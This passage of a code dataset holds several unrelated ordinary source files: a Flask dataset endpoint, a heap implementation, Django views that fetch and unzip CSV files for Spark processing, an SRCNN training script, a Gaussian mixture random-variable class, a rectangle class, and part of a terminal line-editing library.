request.json.get(\"read_type\"),\n \"sequencing_id\": request.json.get(\"sequencing_id\"),\n \"sequencing_date\": request.json.get(\"sequencing_date\"),\n \"sequencing_centre\": request.json.get(\"sequencing_centre\"),\n \"batch_id\": request.json.get(\"batch_id\"),\n \"created_by_id\": created_by_id,\n \"updated_by_id\": updated_by_id,\n \"discriminator\": request.json.get(\"discriminator\"),\n }\n )\n # TODO: add stricter checks?\n if request.json.get(\"linked_files\"):\n for path in request.json[\"linked_files\"]:\n dataset.files.append(models.DatasetFile(path=path))\n db.session.add(dataset)\n transaction_or_abort(db.session.commit)\n ds_id = dataset.dataset_id\n location_header = \"/api/datasets/{}\".format(ds_id)\n\n return (\n jsonify(\n {\n **asdict(dataset),\n \"updated_by\": dataset.updated_by.username,\n \"created_by\": dataset.created_by.username,\n }\n ),\n 201,\n {\"location\": location_header},\n )\n","sub_path":"flask/app/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":15479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"93483019","text":"\"\"\"\n\n@Author: Li Zenghui\n@Date: 2020-03-22 11:11\n\"\"\"\nimport heapq\n\nclass Heap:\n def __init__(self,elist):\n self._elems=list(elist)\n if elist:\n self.buildheap()\n\n def is_empty(self):\n return not self._elems\n\n # 取堆顶元素\n def peek(self):\n if self.is_empty():\n raise ValueError(\"堆为空\")\n return self._elems[0]\n\n # 上浮\n def siftup(self, e, last):\n elems, i, j=self._elems, last, (last-1)//2\n while i > 0 and e < elems[j]:\n elems[i] = elems[j]\n i, j = j, (j-1)//2\n elems[i] = e\n\n # 插入\n def push(self, e):\n self._elems.append(None)\n self.siftup(e, len(self._elems)-1)\n\n # 下沉\n def siftdown(self,e,begin,end):\n elems,i,j=self._elems,begin,begin*2+1\n while j0:\n self.siftdown(e,0,len(elems))\n return e0\n\n # 从数组构建堆\n def buildheap(self):\n end=len(self._elems)\n for i in range(end//2-1,-1,-1):\n self.siftdown(self._elems[i],i,end)\n\n\nif __name__ == '__main__':\n h = Heap([4, 1, 5, 3, 2, 7, 6])\n print(h.pop())\n print(h.pop())\n print(h.pop())\n print(h.pop())\n print(h.pop())\n print(h.pop())","sub_path":"数据结构/队列、堆/06.实现堆.py","file_name":"06.实现堆.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604178570","text":"import io\nimport os\nimport zipfile\n\nfrom django.shortcuts import redirect\nfrom pyspark import SparkContext, SparkConf\n\nimport requests\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom extractor.forms import FileUrlForm\n\nfrom functions.headers import get_headers_as_tuple\nfrom functions.filter import filter_csv_rows\n\n\ndef index(request):\n template = loader.get_template('extractor/index.html')\n if request.method == 'POST':\n form = FileUrlForm(request.POST)\n if form.is_valid():\n url = request.POST['url']\n result = requests.get(url, stream=True)\n if result.status_code != 200:\n context = {'form': FileUrlForm(),\n 'message': 'Couldn\\'t retrieve file - ' + str(result.status_code)}\n return HttpResponse(template.render(context, request))\n else:\n zip = zipfile.ZipFile(io.BytesIO(result.content))\n zip.extractall(path='./data')\n\n datafile = None\n for root, subdirs, files in os.walk('./data'):\n if datafile is not None:\n break;\n for file in files:\n if file.endswith('.csv'):\n datafile = root + '/' + file\n break\n if datafile is not None:\n request.session['datafile'] = datafile\n return redirect('/file')\n\n else:\n form = FileUrlForm()\n\n context = {'form': form}\n return HttpResponse(template.render(context, request))\n\n\ndef file(request):\n datafile = request.session['datafile']\n sc = SparkContext(conf=SparkConf().setAppName(\"data\").setMaster(\"local[2]\"))\n data_text_file = sc.textFile(datafile)\n headers = get_headers_as_tuple(data_text_file)\n\n count = data_text_file.count() - 1\n context = {\n 'file_headers': headers,\n 'count': count\n }\n\n template = loader.get_template('extractor/file.html')\n sc.stop()\n return HttpResponse(template.render(context, request))\n\n\ndef filter(request):\n filter_value = request.POST['filter_value']\n header = request.POST['form_control_headers_select']\n datafile = request.session['datafile']\n sc = SparkContext(conf=SparkConf().setAppName(\"data\").setMaster(\"local[2]\"))\n data_text_file = sc.textFile(datafile)\n result = filter_csv_rows(data_text_file, header, filter_value)\n sc.stop()\n\n","sub_path":"extractor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"608681186","text":"import os\r\nimport argparse\r\nimport torch\r\nimport time\r\nimport shutil\r\nimport utils\r\nfrom model import SRCNN\r\n\r\n\r\ndef parse_args():\r\n\tdescrip = \"Super resolution model\"\r\n\tparser = argparse.ArgumentParser(description=descrip)\r\n\tparser.add_argument(\"--model\", type=str, default=\"SRCNN\", help=\"select which model to use\")\r\n\tparser.add_argument(\"--lr_data_dir\", type=str, default=\"train_images_64\",\\\r\n\t\thelp=\"dir of Low Resolution images\")\r\n\tparser.add_argument(\"--hr_data_dir\", type=str, default = \"train_images_128\", \\\r\n\t\thelp=\"dir of High Resolution images\")\r\n\tparser.add_argument(\"--n_epoches\", type=int, default=5, help=\"the num of n_epoches\")\r\n\tparser.add_argument(\"--batch_size\", type=int, default=3, help=\"batch size\")\r\n\tparser.add_argument(\"--lr\", type=float, default=0.001, help=\"learning rate\")\r\n\tparser.add_argument(\"--save_res_dir\", type=str, default=\"Result\", help=\"diretory to save results and model\")\r\n\tparser.add_argument(\"--res_reciever\", type=str, default=\"widen1226@gmail.com\", help=\"email address to recieve the result\")\r\n\tparser.add_argument(\"--validation\", type=bool, default=False, help=\"whether do 10 fold cross validation or not\")\r\n\tparser.add_argument(\"--test_percent\",type=float, default=0.33, help=\"determine how large is the test set\")\r\n\treturn parser.parse_args()\r\n\r\n\r\ndef main():\r\n\t\"\"\"\r\n\tsomething check args here\r\n\t\"\"\"\r\n\targs = parse_args()\r\n\t\r\n\tif args.model == \"SRCNN\":\r\n\t\tmodel = SRCNN(args)\r\n\r\n\tprint(\"start loading data...\")\r\n\tt1 = time.perf_counter()\r\n\tmodel.load_data()\r\n\tt2 = time.perf_counter()\r\n\tprint(\"data loading completed! time used: %.2f s\" % (t2-t1))\r\n\r\n\tprint(\"start training...\")\r\n\tt3 = time.perf_counter()\r\n\tmodel.train()\r\n\tt4 = time.perf_counter()\r\n\tprint(\"training process completed! time used: %.2f s\" % (t4-t3))\r\n\r\n\tprint(\"start testing...\")\r\n\tt5 = time.perf_counter()\r\n\tmodel.test()\r\n\tt6 = time.perf_counter()\r\n\tprint(\"testing process completed! time used: %.2f s\" % (t6-t5))\r\n\r\n\tprint(\"start test single images...\")\r\n\tt7 = time.perf_counter()\r\n\tmodel.test_single_img(\"test_images_64\")\r\n\tt8 = time.perf_counter()\r\n\tprint(\"testing process completed! time used: %.2f s\" % (t8-t7))\r\n\r\n\t# send to result as email\r\n\tattachment = \"Result\"\r\n\tshutil.make_archive(attachment, 'zip', args.save_res_dir)\r\n\tutils.email_res(reciever = args.res_reciever,\r\n\t\tsubject=\"run_result\",content=None,attach=attachment)\r\n\r\nif __name__ == '__main__':\r\n\tstart = time.perf_counter()\r\n\tmain()\r\n\tend = time.perf_counter()\r\n\tprint(\"********************\")\r\n\tprint(\"All completed! Total time:%.2f s\" % (end-start))\r\n\tprint(\"********************\")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545750059","text":"from numpy import zeros, linspace, exp, random, cumsum, inner, insert, append, argmax\n# from scipy import integrate\nfrom bisect import bisect_left\nfrom scipy.interpolate import interp1d\n\nclass RV:\n\tnPoints = 1000\n\t\n\tdef __init__(self, meanList, varianceList, supportList, weights = None):\n\t\tn = len(meanList)\n\t\t\n\t\t# initialize attributes\n\t\tself.mean = [0]\n\t\tself.variance = [0]\n\t\tself.median = [0]\n\t\tself.mode = [0]\n\t\t\n\n\t\t\n\t\tif weights is None:\n\t\t\tweights = [1./n for k in range(n)]\n\t\t\n\t\t\n\t\t# get the overall support of the distribution\n\t\tminSupp, maxSupp = float('inf'), -float('inf')\n\t\tfor k in range(n):\n\t\t\tif minSupp > supportList[k][0] : minSupp = supportList[k][0]\n\t\t\tif maxSupp < supportList[k][1] : maxSupp = supportList[k][1]\n\t\t\n\t\tself.support = [(minSupp, maxSupp)]\n\t\tself.x = [linspace(minSupp, maxSupp, num=RV.nPoints)]\n\n\t\tself.pdf = [zeros(RV.nPoints)]\n\t\tself.cdf = [zeros(RV.nPoints)]\n\n\t\t\n\t\t# calculate the individual distributions\n\t\tfor k in range(n):\n\t\t\tself.support.append(supportList[k]) \n\t\t\tself.x.append( linspace(supportList[k][0], supportList[k][1], num=RV.nPoints) )\n\t\t\tself.__individualDistribution(self.x[-1], meanList[k], varianceList[k], weights[k])\n\t\t\t\n\t\t# calculate overall statistics\n\t\tself.deriveStatistics(self.x[0], self.pdf[0], 1, \"overall\")\n\t\t\n\t\t\n\t# calculate individual distribution\n\tdef __individualDistribution(self, x, mean, var, weight):\n\t\t\n\t\t# un-normalized gaussian probability density\n\t\tdef f(x):\n\t\t\treturn exp(-(x-mean)**2 / (2*var))\t\t\t\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t# get min and max support of the distribution\n\t\txmin, xmax = x.min(), x.max()\n\n\t\t# make distribution (pdf) over [2*xmin-xmax, 2*xmax-xmin] \n\t\tp = f(x); # distribution over [xmin, xmax] \n\t\tleftTail = f(linspace(2*xmin-xmax, xmin, num=RV.nPoints)) # distribution over [2*xmin-xmax, xmin]\n\t\trightTail = f(linspace(xmax, 2*xmax-xmin, num=RV.nPoints)) # distribution over [xmax, 2*xmax-xmin]\n\t\t\n\t\t# relect the tails and subtract it from p\n\t\tp -= leftTail[::-1] + rightTail[::-1]\t\t\n\t\tp -= p.min()# ensure p is non-negative\n\t\tp = p/p.sum()# normalize p\n\t\t\n\t\t# update the statistics (at the end of the list)\n\t\tself.deriveStatistics(x, p, weight, \"individual\") \t\n\n\t\t\n\t\t# add the individual pdf to the overall pdf\n\t\t\n\t\t# pad the ends of p with zeros\n\t\tp = insert(p, 0,0) \n\t\tp = append(p,0)\n\t\t\n\t\t# align x with self.x[0]\n\t\tx = insert(x, 0, self.x[0][0]) \n\t\tx = append(x, self.x[0][-1])\n\t\t\n\t\t\n\t\t# interpolate p(x) over the grid points of self.x[0]\n\t\tpInterp = interp1d(x,p)\n\t\tpAdd = pInterp(self.x[0])\n\t\tself.pdf[0] += pAdd/sum(pAdd)*weight\t\t\n\n\n\n\n\t\n\t# derive the rest of the distribution using the pdf\n\tdef deriveStatistics(self, x, p, weight, distibutionType):\n\t\tif distibutionType == \"individual\":\t\t\n\t\t\t\n\t\t\tself.pdf.append(weight*p*(self.x[0][-1]- self.x[0][0])/(x[-1] - x[0])) \n\t\t\t\n\t\t\tself.cdf.append(cumsum(p)) # cummulative sum of the pdf\n\t\t\t\n\t\t\tmu = inner(p,x) \n\t\t\tself.mean.append(mu)\n\t\t\t\n\t\t\tself.variance.append(inner(p,(x - mu)**2) )\n\t\t\t\n\t\t\t\n\t\t\tindex = bisect_left(self.cdf[-1], 0.5) # last index with CDF[ind] <=0.5\n\t\t\tself.median.append(x[index])\n\t\t\t\n\t\t\tindex = argmax(p)\n\t\t\tself.mode.append(x[index])\n\t\t\t\n\t\t\t\n\t\t\t\n\t\telse: \t\t\n\t\t\tself.cdf[0] = cumsum(p) # cummulative sum of the pdf\n\t\t\t\n\t\t\tmu = inner(p,x) \n\t\t\tself.mean[0] = mu\n\t\t\t\n\t\t\tself.variance[0] = inner(p,(x - mu)**2) \n\t\t\t\n\t\t\t\n\t\t\tindex = bisect_left(self.cdf[0], 0.5) # last index with CDF[ind] <=0.5\n\t\t\tself.median[0] = x[index]\n\t\t\t\n\t\t\tindex = argmax(p)\n\t\t\tself.mode[0] = x[index]\n\t\t\t\t\n\t\n\tdef displayStats(self):\t\t\n\t\tfor k in range(len(self.mean)):\t\n\t\t\tif k==0 : print(\"Overall Distribution Statistics:\")\n\t\t\telif k==1 : print(\"Individual Distribution Statistics:\")\n\n\t\t\tprint((\" k={0}:\"\n\t\t\t\t \" mean={1:.2f}\"\n\t\t\t\t \" variance={2:.2f}\"\n\t\t\t\t \" support=({3[0]},{3[1]})\"\n\t\t\t\t \" median={4:.2f}\"\n\t\t\t\t \" mode={5:.2f}\")\\\n\t\t\t\t .format(k, self.mean[k], self.variance[k], self.support[k], self.median[k], self.mode[k]))\n\n\n\n\tdef randomSample(self):\n\t\t# obtain a random sample using the inverse CDF \n\t\tind = bisect_left(self.cdf[0], random.rand()) \n\t\t\n\t\treturn self.x[0][ind]\n\t\t\n\t\t\n\t\t\n\t\n\n\t\t\n\t\t\n\t\t\n\n","sub_path":"RandomVariable.py","file_name":"RandomVariable.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"227393477","text":"from PolygonLib import Polygon\n\nclass Rectangle(Polygon):\n def __init__(self):\n super().__init__(4)\n\n def setSideLength(self):\n super().setSideLength()\n distinctLengthSet = set(self.Sides)\n if len(distinctLengthSet) > 2:\n raise Exception(\"invalid side length for a rectangle\")\n\n def findArea(self):\n area = 0\n distinctLengthSet = set(self.Sides)\n distinctLengthList = list(distinctLengthSet)\n if len(distinctLengthList) == 2:\n area = distinctLengthList[0] * distinctLengthList[1]\n elif len(distinctLengthList) == 1:\n area = distinctLengthList[0] ** 2\n else:\n raise Exception(\"Unable to find the area due to invalid side length\")\n print(\"The area of this rectangle is {0}\".format(area))\n\n def findPerimeter(self):\n perimeter = 0\n for side in self.Sides:\n perimeter = perimeter + side\n print(\"the perimeter of this rectangle is {}\".format(perimeter))\n\nmyRectangle = Rectangle()\nmyRectangle.setSideLength()\nmyRectangle.showSideLength()\nmyRectangle.findArea()\nmyRectangle.findPerimeter()","sub_path":"yxg/Practices/Class/Rectangle.py","file_name":"Rectangle.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"26621226","text":"import enum\nimport types\nimport wrapio\nimport os\nimport string\nimport itertools\n\nfrom . import helpers\n\n\n__all__ = ('Source', 'Translator', 'LineEditor', 'MultiLineEditor', 'Select',\n 'MultiSelect')\n\n\n_blocks = string.whitespace + string.punctuation\n\n\nclass Source(helpers.Handle):\n\n \"\"\"\n Turns stdin reads into events.\n \"\"\"\n\n Event = enum.Enum(\n 'Event',\n 'move_left move_right jump_left jump_right move_up move_down '\n 'delete_left delete_right escape indent enter insert'\n )\n\n _events = types.SimpleNamespace(\n arrows = {\n 'D': Event.move_left,\n 'C': Event.move_right,\n 'A': Event.move_up,\n 'B': Event.move_down\n },\n normal = {\n '\\x0d': Event.enter,\n '\\x0a': Event.enter,\n '\\x7f': Event.delete_left,\n '\\x08': Event.delete_right,\n '\\x09': Event.indent\n },\n special = {\n '': Event.escape,\n 'b': Event.jump_left,\n 'f': Event.jump_right\n }\n )\n\n __slots__ = ('_io', '_done')\n\n def __init__(self, io, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._io = io\n\n self._done = False\n\n def _escape(self):\n\n key = self._io.recv()\n\n if key == '[':\n key = self._io.recv()\n events = self._events.arrows\n else:\n events = self._events.special\n\n return (events, key)\n\n def _advance(self):\n\n key = self._io.recv()\n\n if key == '\\x1b':\n (events, key) = self._escape()\n else:\n events = self._events.normal\n\n event = events.get(key, self.Event.insert)\n\n self._dispatch(event, key)\n\n def done(self):\n\n self._done = True\n\n def stream(self):\n\n with self._io.atomic:\n while not self._done:\n self._advance()\n\n self._done = False\n\n\nclass Abort(Exception):\n\n \"\"\"\n Raise when something's wrong.\n \"\"\"\n\n __slots__ = ()\n\n\nclass Translator(helpers.Handle):\n\n \"\"\"\n Combines related io events into single events with relevant info.\n\n .. code-block: python\n\n translator = Translator(callback = ...)\n source = Source(io, callback = translator.invoke)\n \"\"\"\n\n Event = enum.Enum(\n 'Event',\n 'move_x jump_x move_y delete insert enter'\n )\n\n __slots__ = ('_io',)\n\n def __init__(self, io, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._io = io\n\n def _move_x(self, left):\n\n self._dispatch(self.Event.move_x, left)\n\n @wrapio.event(Source.Event.move_left)\n def _nnc(self, key):\n\n self._move_x(True)\n\n @wrapio.event(Source.Event.move_right)\n def _nnc(self, key):\n\n self._move_x(False)\n\n def _jump_x(self, left):\n\n self._dispatch(self.Event.jump_x, left)\n\n @wrapio.event(Source.Event.jump_left)\n def _nnc(self, key):\n\n self._jump_x(True)\n\n @wrapio.event(Source.Event.jump_right)\n def _nnc(self, key):\n\n self._jump_x(False)\n\n def _move_y(self, up):\n\n self._dispatch(self.Event.move_y, up)\n\n @wrapio.event(Source.Event.move_up)\n def _nnc(self, key):\n\n self._move_y(True)\n\n @wrapio.event(Source.Event.move_down)\n def _nnc(self, key):\n\n self._move_y(False)\n\n def _delete(self, left):\n\n self._dispatch(self.Event.delete, left)\n\n @wrapio.event(Source.Event.delete_left)\n def _nnc(self, key):\n\n self._delete(True)\n\n @wrapio.event(Source.Event.delete_right)\n def _nnc(self, key):\n\n self._delete(False)\n\n def _insert(self, key):\n\n self._dispatch(self.Event.insert, key)\n\n @wrapio.event(Source.Event.insert)\n def _nnc(self, key):\n\n self._insert(key)\n\n @wrapio.event(Source.Event.indent)\n def _nnc(self, key):\n\n self._insert('\\t')\n\n def _enter(self, key):\n\n self._dispatch(self.Event.enter, key)\n\n @wrapio.event(Source.Event.enter)\n def _nnc(self, key):\n\n self._enter(key)\n\n def invoke(self, *args, **kwargs):\n\n try:\n fail = super().invoke(*args, **kwargs)\n except Abort:\n fail = True\n else:\n if fail:\n return\n fail = False\n\n if fail:\n self._io.ring()\n\n return fail\n\n\nclass WindowView:\n\n \"\"\"\n ABC for classes implementing something that can be partially viewed.\n \"\"\"\n\n __slots__ = () # ('_index', '_lower', '_bound') on each subclass\n\n def __init__(self, bound):\n\n self._index = 0\n self._lower = 0\n self._bound = bound\n\n @property\n def _upper(self):\n\n return self._lower + self._bound\n\n @property\n def _among(self):\n\n return self._index - self._lower\n\n @property\n def among(self):\n\n return self._among\n\n @property\n def index(self):\n\n return self._index\n\n def _calibrate(self):\n\n if self._index < self._lower:\n # |[abc] <- [|ab]c\n self._lower = self._index\n elif self._index > self._upper:\n # [abc]| -> a[bc|]\n self._lower = self._index - self._bound\n else:\n return False\n\n return True\n\n def _resize(self, size):\n\n bound = self._bound + size\n\n if bound < 0:\n raise ValueError('bound would be negative')\n\n self._bound += size\n\n if size > 0:\n self._lower = max(0, self._lower - size)\n\n self._calibrate()\n\n def _reset(self):\n\n self._index = 0\n self._lower = 0\n\n\nclass Tool(WindowView, helpers.Handle):\n\n \"\"\"\n ABC for partially-viewable handlers.\n \"\"\"\n\n __slots__ = ('_index', '_lower', '_bound', '_io', '_cursor')\n\n def __init__(self, io, cursor, bound, *args, **kwargs):\n\n WindowView.__init__(self, bound)\n helpers.Handle.__init__(self, *args, **kwargs)\n\n self._io = io\n self._cursor = cursor\n\n def _clear(self):\n\n raise NotImplementedError()\n\n def clear(self):\n\n self._clear()\n\n def _draw(self, lower):\n\n raise NotImplementedError()\n\n def draw(self):\n\n self._draw(self._lower)\n\n def _focus(self):\n\n raise NotImplementedError()\n\n def focus(self):\n\n self._focus()\n\n def _redraw(self, skip = False):\n\n if not skip:\n self._clear()\n\n self._draw(self._lower)\n\n self._focus()\n\n def resize(self, size, full = True):\n\n if full:\n self._clear()\n\n self._resize(size)\n\n if full:\n self._redraw(skip = True)\n\n def _move_y(self, up, size):\n\n pass\n\n def _e_move_y(self, up, size):\n\n self._move_y(up, size)\n\n self._dispatch('move_y', up, size)\n\n @wrapio.event(Translator.Event.move_y)\n def _nnc(self, up):\n\n self._e_move_y(up, 1)\n\n def _move_x(self, left, size):\n\n pass\n\n def _e_move_x(self, left, size):\n\n self._move_x(left, size)\n\n self._dispatch('move_x', left, size)\n\n @wrapio.event(Translator.Event.move_x)\n def _nnc(self, left):\n\n self._e_move_x(left, 1)\n\n def _jump_x(self, left):\n\n pass\n\n def _e_jump_x(self, left):\n\n self._jump_x(left)\n\n self._dispatch('jump_x', left)\n\n @wrapio.event(Translator.Event.jump_x)\n def _nnc(self, left):\n\n self._e_jump_x(left)\n\n def _tab(self):\n\n pass\n\n def _e_tab(self):\n\n self._tab()\n\n self._dispatch('tab')\n\n def _insert(self, runes):\n\n pass\n\n def _e_insert(self, runes):\n\n if '\\t' in runes:\n self._e_tab()\n return\n\n runes = self._insert(runes)\n\n self._dispatch('insert', runes)\n\n return runes\n\n def insert(self, runes):\n\n runes = self._e_insert(runes)\n\n return runes\n\n @wrapio.event(Translator.Event.insert)\n def _nnc(self, rune):\n\n runes = (rune,)\n\n self._e_insert(runes)\n\n def _delete(self, left, size):\n\n pass\n\n def _e_delete(self, left, size):\n\n self._delete(left, size)\n\n self._dispatch('delete', left, size)\n\n def delete(self, left, size):\n\n self._e_delete(left, size)\n\n @wrapio.event(Translator.Event.delete)\n def _nnc(self, left):\n\n self._e_delete(left, 1)\n\n def _submit(self):\n\n self._dispatch('submit')\n\n def _enter(self):\n\n raise NotImplementedError()\n\n @wrapio.event(Translator.Event.enter)\n def _nnc(self, rune):\n\n self._enter()\n\n\ndef _clean(value):\n\n value = helpers.seq.clean(value)\n value = helpers.clean(value)\n\n return value\n\n\nclass LineEditor(Tool):\n\n \"\"\"\n Use for editing a single line of text.\n\n Does not support line breaks or moving vertically.\n \"\"\"\n\n __slots__ = ('_limit', '_funnel', '_buffer')\n\n def __init__(self,\n io,\n cursor,\n width,\n limit,\n funnel,\n *args,\n **kwargs):\n\n super().__init__(io, cursor, width, **kwargs)\n\n self._limit = limit\n\n self._funnel = funnel\n\n self._buffer = []\n\n @property\n def buffer(self):\n\n return self._buffer\n\n def _place(self):\n\n self._cursor.left(self._among)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.erase()\n\n def _transform(self, rune):\n\n rune = self._funnel(rune)\n\n if not len(rune) == 1:\n raise RuntimeError('rune must be of size 1')\n\n if not rune.isprintable():\n raise RuntimeError('rune must be printable')\n\n return rune\n\n def _show(self, runes):\n\n if self._funnel:\n runes = map(self._transform, runes)\n\n runes = tuple(runes)\n\n value = ''.join(runes)\n\n self._io.send(value)\n\n def _chunk(self, lower):\n\n runes = self._buffer[lower:self._upper]\n\n return runes\n\n def _draw(self, lower):\n\n runes = self._chunk(lower)\n\n self._show(runes)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n size = self._shown - self._among\n\n self._cursor.left(size)\n\n def _move_x(self, left, size):\n\n if left:\n limit = self._index\n else:\n limit = len(self._buffer) - self._index\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n if left:\n index = self._index - size\n limit = self._among\n self._cursor.left(min(limit, size))\n else:\n index = self._index + size\n limit = self._shown - self._among\n self._cursor.right(min(limit, size))\n\n self._index = index\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n\n return change\n\n def move(self, left, size):\n\n self._move_x(left, size)\n\n def _jump_x_left(self):\n\n limit = 0\n\n stop = self._index - 1\n\n if stop < limit:\n raise Abort()\n\n indexes = []\n for block in _blocks:\n try:\n index = helpers.rindex(self._buffer, block, 0, stop)\n except ValueError:\n continue\n indexes.append(index + 1)\n else:\n indexes.append(limit)\n\n size = min(self._index - index for index in indexes)\n\n self._move_x(True, size)\n\n def _jump_x_right(self):\n\n limit = len(self._buffer)\n\n start = self._index + 1\n\n if start > limit:\n raise Abort()\n\n indexes = []\n for block in _blocks:\n try:\n index = self._buffer.index(block, start)\n except ValueError:\n continue\n indexes.append(index)\n else:\n indexes.append(limit)\n\n size = min(index - self._index for index in indexes)\n\n self._move_x(False, size)\n\n def _jump_x(self, left):\n\n if left:\n self._jump_x_left()\n else:\n self._jump_x_right()\n\n def jump(self, left):\n\n self._jump_x(left)\n\n def _ensure(self, runes):\n\n value = ''.join(runes)\n value = _clean(value)\n\n return value\n\n def _insert(self, runes):\n\n runes = self._ensure(runes)\n runes = tuple(runes)\n\n esize = len(runes)\n osize = len(self._buffer)\n nsize = osize + esize\n\n if not self._limit is None and nsize > self._limit:\n raise Abort()\n\n start = self._index\n\n for (index, rune) in enumerate(runes):\n self._buffer.insert(start + index, rune)\n\n among = not start == osize\n\n self._index = start + esize\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n elif among:\n self._draw(start)\n self._focus()\n else:\n self._show(runes)\n\n return runes\n\n def _delete(self, left, size):\n\n if left:\n self._move_x(True, size)\n\n limit = len(self._buffer) - self._index\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n for _ in range(size):\n del self._buffer[self._index]\n\n self._cursor.erase()\n\n self._draw(self._index)\n\n self._focus()\n\n def _enter(self):\n\n self._submit()\n\n\nclass Originful:\n\n __slots__ = () # ('_origin',) on each subclass\n\n def _originate(self):\n\n (cy, cx) = self._cursor.locate()\n\n self._origin = cx - 1\n\n\nclass MultiLineEditor(Tool, Originful):\n\n \"\"\"\n Use for editing multiple lines of text.\n\n Supports line breaks or moving vertically.\n \"\"\"\n\n __slots__ = ('_origin', '_finchk', '_subs', '_make', '_limit', '_indent')\n\n def __init__(self,\n io,\n cursor,\n finchk,\n height,\n width,\n limit,\n funnel,\n indent,\n *args,\n **kwargs):\n\n Tool.__init__(self, io, cursor, height - 1, *args, **kwargs)\n\n self._finchk = finchk\n\n make = lambda: LineEditor(io, cursor, width, None, funnel)\n\n self._subs = [make()]\n\n self._make = make\n\n self._limit = limit\n\n self._indent = indent\n\n self._originate()\n\n @property\n def _sub(self):\n\n return self._subs[self._index]\n\n @property\n def subs(self):\n\n return self._subs\n\n def _place(self):\n\n self._cursor.last(self._among)\n self._cursor.right(self._origin)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.clear()\n\n def _chunk(self, lower):\n\n upper = self._upper + 1\n\n runes = self._subs[lower:upper]\n\n return runes\n\n def _draw(self, lower):\n\n self._originate()\n\n subs = self._chunk(lower)\n\n last = len(subs) - 1\n for (index, sub) in enumerate(subs):\n sub.draw()\n if index == last:\n break\n self._io.send(os.linesep)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n # if 1 shown and among 0, then move 0\n ysize = self._shown - self._among - 1\n\n self._cursor.last(ysize)\n\n xsize = self._sub.among\n\n if not self._among:\n xsize += self._origin\n\n self._cursor.right(xsize)\n\n _SpotType = enum.Enum('SpotType', 'match left right')\n\n def _spot(self, old, new, type):\n\n to_left = - new.index\n to_right = len(new.buffer) + to_left\n\n if type is self._SpotType.match:\n difference = old.index - new.index\n size = max(to_left, min(to_right, difference))\n elif type is self._SpotType.left:\n size = to_left\n elif type is self._SpotType.right:\n size = to_right\n else:\n raise ValueError('unknown move type')\n\n new.move(size < 0, abs(size))\n\n def _move_y(self, up, size, type = _SpotType.match):\n\n if up:\n limit = self._index\n else:\n # if 1 sub and index 0, then limit is 0\n limit = len(self._subs) - self._index - 1\n\n excess = size - limit\n if excess > 0:\n raise Abort(excess)\n\n if up:\n index = self._index - size\n limit = self._among\n self._cursor.last(min(limit, size))\n else:\n index = self._index + size\n limit = self._shown - self._among - 1\n self._cursor.next(min(limit, size))\n\n old = self._sub\n self._index = index\n new = self._sub\n\n xsize = new.among\n if not self._among:\n xsize += self._origin\n self._cursor.right(xsize)\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n\n if not type is None:\n self._spot(old, new, type)\n\n def _rcut(self, left):\n\n if left:\n (*subs, sub) = self._subs[:self._index + 1]\n buffer = sub.buffer[:sub.index]\n subs = reversed(subs)\n else:\n (sub, *subs) = self._subs[self._index:]\n buffer = sub.buffer[sub.index:]\n\n buffers = (buffer, *(sub.buffer for sub in subs))\n\n return buffers\n\n def _rmsr(self, buffers, xsize):\n\n ysize = 0\n nsize = xsize\n for buffer in buffers:\n nsize -= len(buffer) + 1\n if nsize < 0:\n break\n xsize = nsize\n ysize += 1\n\n return (ysize, xsize)\n\n def _rclc(self, left, xsize):\n\n buffers = self._rcut(left)\n\n # remove one to account for current line\n limit = sum(map(len, buffers)) + len(buffers) - 1\n\n excess = xsize - limit\n if excess > 0:\n raise Abort(excess)\n\n (ysize, xsize) = self._rmsr(buffers, xsize)\n\n return (ysize, xsize)\n\n def _move_x(self, left, xsize):\n\n (ysize, xsize) = self._rclc(left, xsize)\n\n if ysize:\n type = self._SpotType.right if left else self._SpotType.left\n self._move_y(left, ysize, type)\n\n self._sub.move(left, xsize)\n\n return (ysize, xsize)\n\n def move(self, left, size):\n\n self._move_x(left, size)\n\n def _jump_x(self, left):\n\n try:\n self._sub.jump(left)\n except Abort:\n self._move_x(left, 1)\n\n def _ensure(self, runes):\n\n esize = len(runes)\n buffers = tuple(sub.buffer for sub in self._subs)\n osize = sum(map(len, buffers)) + len(buffers) - 1\n nsize = osize + esize\n\n if not self._limit is None and nsize > self._limit:\n raise Abort()\n\n def _tab(self):\n\n self._e_insert((' ',) * self._indent)\n\n def _insert(self, runes):\n\n values = helpers.split(runes, os.linesep)\n values = tuple(values)\n\n runes = tuple(itertools.chain.from_iterable(values))\n\n self._ensure(runes)\n\n last = len(values) - 1\n buffer = []\n for (index, runes) in enumerate(values):\n runes = self._sub.insert(runes)\n buffer.extend(runes)\n if index == last:\n break\n self._newsub()\n buffer.append(os.linesep)\n\n return buffer\n\n def _delete(self, left, size):\n\n if left:\n self._move_x(True, size)\n\n (ysize, xsize) = self._rclc(False, size)\n\n kli = self._index + 1\n sub = self._sub\n\n for index in 